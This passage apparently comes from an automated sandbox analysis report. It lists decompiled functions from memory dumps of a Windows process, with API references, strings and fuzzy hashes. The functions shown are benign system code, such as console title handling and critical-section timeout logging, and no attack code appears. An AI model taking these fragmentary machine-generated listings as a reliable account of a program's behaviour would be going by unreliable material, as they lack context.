                                              • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 002BCE81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: ConsoleTitle
                                              • String ID: -
                                              • API String ID: 3358957663-3695764949
                                              • Opcode ID: 0c3c5457b39a8e6acc9d4cad34ac38ea4d808d88310e7076391fd7afc2e518fa
                                              • Instruction ID: 92e9d24c66b046223adbb2650f8676a169175b38802ef05833967735d8d4de03
                                              • Opcode Fuzzy Hash: 0c3c5457b39a8e6acc9d4cad34ac38ea4d808d88310e7076391fd7afc2e518fa
                                              • Instruction Fuzzy Hash: 6521493162014187C729AF2CD8A9BFE77A1AB843C0F68452DEC0657354EE309D66CBC1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C8430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                              Download Yara Rule
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002C8459
                                              • printf.MSVCRT ref: 002C84B4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                              • String ID: %3d
                                              • API String ID: 2845598586-2138283368
                                              • Opcode ID: da72bc6745a51191d8221ec0184a7ffdc22a76e10a3c831fc7e52b753802bd28
                                              • Instruction ID: 2d475cff455786a266476ef113938379b75de1a591a7d19670b256db2a56ef12
                                              • Opcode Fuzzy Hash: da72bc6745a51191d8221ec0184a7ffdc22a76e10a3c831fc7e52b753802bd28
                                              • Instruction Fuzzy Hash: 4D01F971670205BBEB20AB559C8AFEB3A9DDB85BE0F008119FB0C69181D9B19C70D671
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B0C70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 002B72B5: __EH_prolog3_catch.LIBCMT ref: 002B7650
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                              • memset.MSVCRT ref: 002B0CDD
                                              Strings
                                              • onecore\base\cmd\maxpathawarestring.cpp, xrefs: 002BCD51
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: H_prolog3_catchmemset
                                              • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                              • API String ID: 620422817-3416068913
                                              • Opcode ID: 939029c946376a5ef8d753ec3306465798a128ca431e24d9ac5b160c1f7f897d
                                              • Instruction ID: 74a649a00f382e773317e6405d37b9b229b7e769321bdfa3d970934d6ed2b384
                                              • Opcode Fuzzy Hash: 939029c946376a5ef8d753ec3306465798a128ca431e24d9ac5b160c1f7f897d
                                              • Instruction Fuzzy Hash: 580128713103449BD7208A799C89BABB6C9EB80390F14063AF95AD7240DFF6EC60C6A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0302FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 53%
                                              			E0302FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02FDCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03025720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03025720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                              0x0302fdda
                                              0x0302fde2
                                              0x0302fde5
                                              0x0302fdec
                                              0x0302fdfa
                                              0x0302fdff
                                              0x0302fe0a
                                              0x0302fe0f
                                              0x0302fe17
                                              0x0302fe1e
                                              0x0302fe19
                                              0x0302fe19
                                              0x0302fe19
                                              0x0302fe20
                                              0x0302fe21
                                              0x0302fe22
                                              0x0302fe25
                                              0x0302fe40

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0302FDFA
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0302FE2B
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0302FE01
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.678247659.0000000002F70000.00000040.00000001.sdmp, Offset: 02F70000, based on PE: true
                                              • Associated: 00000004.00000002.678842186.000000000308B000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: f6237627df68641bd16427cfa5e90fbb5f5a103cee97243f132c3a430f4c276a
                                              • Instruction ID: 54185e80f5055606fc6dfe7f0eb0691c31cbb20a859847438c5bfd866e72ae1f
                                              • Opcode Fuzzy Hash: f6237627df68641bd16427cfa5e90fbb5f5a103cee97243f132c3a430f4c276a
                                              • Instruction Fuzzy Hash: 3EF02232240601BBEA206A55DC02F33BF6AEB81770F140204FB284A1D0DA62F82097A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002ADEF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: iswspacewcschr
                                              • String ID: =,;
                                              • API String ID: 287713880-1539845467
                                              • Opcode ID: f1ff14c765f9b9100bf52108ef714ad3b22005874bcdcea092937015857e6cba
                                              • Instruction ID: 1bfca3cdf76e60237e5886d9d20ef0b58f331c707346ebc1b1cd4943d69a003c
                                              • Opcode Fuzzy Hash: f1ff14c765f9b9100bf52108ef714ad3b22005874bcdcea092937015857e6cba
                                              • Instruction Fuzzy Hash: D1E04F376785239B47340F0DB809A67D6E9DAE7B2132A005BFC07D3D90EEA18C6191D0
                                              Uniqueness

                                              Uniqueness Score: -1.00%